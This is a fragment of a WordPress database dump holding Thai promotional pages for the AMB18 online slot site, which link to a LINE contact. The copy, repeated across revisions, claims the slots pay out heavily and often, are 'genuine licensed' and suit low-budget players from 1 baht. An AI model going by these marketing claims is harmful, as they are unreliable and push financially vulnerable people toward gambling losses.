โดยเฉพาะเกมที่เน้นตัวคูณสูงและโบนัสเข้าบ่อยเหมาะกับสายทุนน้อยที่ต้องการลุ้นกำไรแตกจริงแบบมีจังหวะ เกมเหล่านี้ถูกออกแบบให้เข้าใจง่าย ไม่ซับซ้อนมือใหม่ก็สามารถเรียนรู้ได้ภายในไม่กี่รอบ จุดเด่นคือการมีฟีเจอร์เสริมที่ช่วยเร่งการทำเงิน เช่น ฟรีสปินหรือการสุ่มรางวัลพิเศษ ใครที่อยากเริ่มต้นด้วยงบจำกัดแต่หวังผลกำไรชัดเจน <strong>สล็อตแตกหนัก 2025</strong> มีรายชื่อเกมที่ควรลองดังต่อไปนี้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Ganesha Fortune ธีมเทพเจ้านำโชคของอินเดีย พร้อมตัวคูณและโบนัสสปินฟรีที่น่าสนใจ</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Ganesha Fortune เป็นเกมสล็อตธีมเทพเจ้าที่โดดเด่นเรื่องบรรยากาศสีทองและสัญลักษณ์นำโชคแบบอินเดีย จุดขายสำคัญคือระบบตัวคูณที่สามารถเพิ่มมูลค่ารางวัลได้หลายเท่าเมื่อเข้าสู่รอบโบนัสสปินฟรี ผู้เล่นสามารถลุ้นสัญลักษณ์พิเศษที่กระตุ้นการหมุนซ้ำและเพิ่มโอกาสรับเงินรางวัลก้อนโต รูปแบบเกมเข้าใจง่าย เส้นไลน์ไม่ซับซ้อน เหมาะกับทั้งมือใหม่และสายเก๋า ค่าอัตราการคืนเงินอยู่ในระดับดี ทำให้หลายคนยกให้เป็นหนึ่งในเกมแตกบ่อยของแพลตฟอร์มนี้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Fortune Ox เกมธีมวัวนำโชคที่เล่นง่าย มีอัตราการคืนเงินดีและเหมาะกับผู้เล่นทุกระดับ </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Fortune Ox เป็นเกมสล็อตธีมวัวนำโชคที่เน้นความเรียบง่ายแต่แฝงพลังทำกำไร สัญลักษณ์หลักคือวัวทองที่มาพร้อมรางวัลตัวคูณสูง ระบบการเล่นไม่ซับซ้อน เหมาะกับผู้เล่นทุกระดับ ตั้งแต่มือใหม่ที่เพิ่งเริ่มต้นจนถึงสายปั่นมืออาชีพ จุดเด่นคืออัตราการคืนเงินที่อยู่ในเกณฑ์น่าสนใจ และรอบโบนัสที่สามารถเกิดได้บ่อยเมื่อจัดการงบอย่างมีวินัย ใครที่มองหาเกมเล่นง่าย ลุ้นสนุก และมีโอกาสรับรางวัลต่อเนื่อง Fortune Ox คืออีกหนึ่งตัวเลือกที่ควรลอง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Pinata Wins ธีมเทศกาลที่มีตัวคูณและโบนัสพินาต้า เพิ่มโอกาสทำกำไรได้แบบไม่ธรรมดา </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Pinata Wins มาในธีมเทศกาลสีสันสดใส ให้บรรยากาศสนุกและตื่นเต้นทุกครั้งที่หมุน วงล้อเต็มไปด้วยสัญลักษณ์ขนมและพินาต้าที่ซ่อนรางวัลพิเศษ ฟีเจอร์เด่นคือโบนัสพินาต้าที่สามารถสุ่มตัวคูณและรางวัลเงินสดแบบทันที เมื่อเข้าสู่รอบพิเศษผู้เล่นมีโอกาสรับตัวคูณสะสมที่เพิ่มมูลค่ารางวัลอย่างก้าวกระโดด เกมนี้เหมาะกับสายลุ้นที่ต้องการความเร้าใจและโอกาสทำกำไรในรอบสั้น ถือเป็นอีกเกมที่ได้รับความนิยมในหมวดเกมสล็อตแตกหนัก</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บ ตรง แตก หนัก 2025 สุดยอดแหล่งเกมคุณภาพ เล่นง่าย มาพร้อมค่ายแห่งความปังแห่งปี </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>สัมผัสความสนุกแบบจัดเต็มกับทาง <strong>เว็บ ตรง แตก หนัก 2025 </strong>ไม่ได้มีดีแค่จำนวนเกม แต่ยังรวมค่ายพัฒนาระดับสากลที่ขึ้นชื่อเรื่องคุณภาพและความเสถียรของระบบแต่ละค่ายมีเอกลักษณ์เฉพาะตัว ทั้งด้านกราฟิก ฟีเจอร์ และโครงสร้างการจ่ายรางวัล ผู้เล่นสามารถเลือกสไตล์ที่ตรงกับแนวทางการปั่นของตัวเองได้อย่างอิสระ ไม่ว่าจะชอบเกมภาพอลังการหรือเกมเรียบง่ายเน้นแตกบ่อยก็สามารถที่ะเข้าเล่นง่ายการรวมค่ายดังไว้ในที่เดียวช่วยให้ประสบการณ์เล่นครบเครื่องและเพิ่มโอกาสค้นพบเกมทำเงินใหม่ได้ตลอดเวลา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เว็บตรงแตกหนัก 2025 ค่ายเกม RED TIGER</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>RED TIGER เป็นค่ายเกมที่โดดเด่นด้านกราฟิกคุณภาพสูงและระบบแจ็คพอตที่น่าสนใจ เกมส่วนใหญ่มีฟีเจอร์เสริมหลากหลาย เช่น ตัวคูณแบบสุ่มและวงล้อโบนัสพิเศษ จุดแข็งคือความเสถียรและการออกแบบที่ทันสมัย ทำให้ผู้เล่นได้รับประสบการณ์ที่ลื่นไหลและตื่นเต้นในทุกการหมุน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่ายเกม SPADGAMING</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>SPADGAMING เป็นค่ายที่ได้รับความนิยมในตลาดเอเชีย ด้วยธีมเกมที่เข้าถึงง่ายและเน้นสัญลักษณ์นำโชคแบบวัฒนธรรมตะวันออก หลายเกมมีอัตราการคืนเงินที่อยู่ในระดับดี เหมาะกับสายทุนน้อยที่ต้องการลุ้นกำไรต่อเนื่อง รูปแบบการเล่นไม่ซับซ้อน แต่มีฟีเจอร์โบนัสที่สร้างความตื่นเต้นได้ตลอดการปั่น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่ายเกม RVO PLAY</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>RVO PLAY โดดเด่นเรื่องการออกแบบเกมที่ทันสมัยและมีลูกเล่นเฉพาะตัว หลายเกมมีระบบตัวคูณสะสมและรอบพิเศษที่เปิดโอกาสให้รับรางวัลก้อนใหญ่ เหมาะกับผู้เล่นที่ชอบความแปลกใหม่และต้องการประสบการณ์แตกต่างจากสล็อตทั่วไป</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บตรงแตกหนัก 2025 มาพร้อมฟรีสปิน แจกหนัก ด้วยการซื้อฟีเจอร์ Buy Free Spin </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>ในการเลือกเล่นกับทาง <strong>เว็บตรงแตกหนัก 2025</strong> เพิ่มทางเลือกให้สายลุ้นด้วยฟีเจอร์ Buy Free Spin ที่เปิดโอกาสให้เข้าสู่รอบโบนัสได้ทันทีโดยไม่ต้องรอสัญลักษณ์ครบตามเงื่อนไข ฟีเจอร์นี้เหมาะกับผู้เล่นที่ต้องการเร่งจังหวะทำกำไรและลดเวลาการสะสมสัญลักษณ์ การซื้อฟรีสปินช่วยให้เข้าถึงตัวคูณสูงและรางวัลพิเศษได้เร็วขึ้น อย่างไรก็ตามควรวางแผนงบประมาณอย่างรอบคอบเพื่อบริหารความเสี่ยง เมื่อใช้อย่างมีวินัย ฟีเจอร์นี้สามารถเป็นเครื่องมือสำคัญในการสร้างกำไรระยะสั้นและเพิ่มความตื่นเต้นให้ทุกการเล่นบนแพลตฟอร์มแห่งนี้ และถ้าคุณมีข้อมูลที่สงสัยเพิ่มเติมสามารถที่จะติดต่อสอบถามผ่านทาง <a href=\"http://luca333line.com\"><strong>ไลน์</strong></a> ได้ตลอดเวลา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 เล่นง่าย แตกจริงแจกหนักกำไรดี','','inherit','closed','closed','','412-revision-v1','','','2026-03-02 08:30:45','2026-03-02 08:30:45','',412,'https://amb18slot.com/?p=420',0,'revision','',0),(422,3,'2026-05-19 09:55:38','2026-05-19 09:55:38','','Web-slot-bet-1-baht-AMB18.webp','','inherit','','closed','','web-slot-bet-1-baht-amb18-webp','','','2026-05-19 09:55:38','2026-05-19 09:55:38','',0,'https://amb18slot.com/wp-content/uploads/2026/05/Web-slot-bet-1-baht-AMB18.webp',0,'attachment','image/webp',0),(423,3,'2026-05-19 09:55:38','2026-05-19 09:55:38','<p style=\"text-align: center;\"><a style=\"color: #ff6600;\" href=\"http://luca333.net\" target=\"_blank\" rel=\"noopener\"><strong>Luca333</strong></a></p>','FT Luca333.net','','publish','closed','closed','','ft-luca333-net','','','2026-05-19 09:55:39','2026-05-19 09:55:39','',0,'https://amb18slot.com/?elementor_library=ft-luca333-net',0,'elementor_library','',0),(424,3,'2026-05-19 09:55:38','2026-05-19 09:55:38','','FT Luca333.net','','inherit','closed','closed','','423-revision-v1','','','2026-05-19 09:55:38','2026-05-19 09:55:38','',423,'https://amb18slot.com/?p=424',0,'revision','',0),(425,3,'2026-05-19 09:55:39','2026-05-19 09:55:39','<p style=\"text-align: center;\"><a style=\"color: #ff6600;\" href=\"http://luca333.net\" target=\"_blank\" rel=\"noopener\"><strong>Luca333</strong></a></p>','FT Luca333.net','','inherit','closed','closed','','423-revision-v1','','','2026-05-19 09:55:39','2026-05-19 09:55:39','',423,'https://amb18slot.com/?p=425',0,'revision','',0),(427,3,'2026-05-19 09:56:19','2026-05-19 09:56:19','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"AMB18\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม </p><p>ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\n</h2> <p>จุดแข็งอีกอย่างสุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ <b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b>คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</p><h3><b>ค่ายเกม PG SLOT</b></h3><p>หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</p><h3><b>ค่ายเกม JOKER GAMING</b></h3><p>JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</p><h3><b>ค่ายเกม JILI SLOT</b></h3><p>JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2> AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\n</h2> <p>สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</p> <h2>แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น</h2> <p>ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</p><h3><b>AMB18 </b><b>เกม Wild West Gold </b></h3><p>Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</p><h3><b>เกม Bonanza Gold </b></h3><p>Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</p><h3><b>เกม The Dog House Megaways</b></h3><p>The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี</h2> <p>เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย <b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b>มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด <a href=\"http://luca333line.com\"><b>ไลน์</b></a> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-05-19 09:56:19','2026-05-19 09:56:19','',44,'https://amb18slot.com/?p=427',0,'revision','',0),(428,3,'2026-05-19 09:56:19','2026-05-19 09:56:19','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"AMB18\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม </p><p>ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\n</h2> <p>จุดแข็งอีกอย่างสุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ <b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b>คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</p><h3><b>ค่ายเกม PG SLOT</b></h3><p>หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล 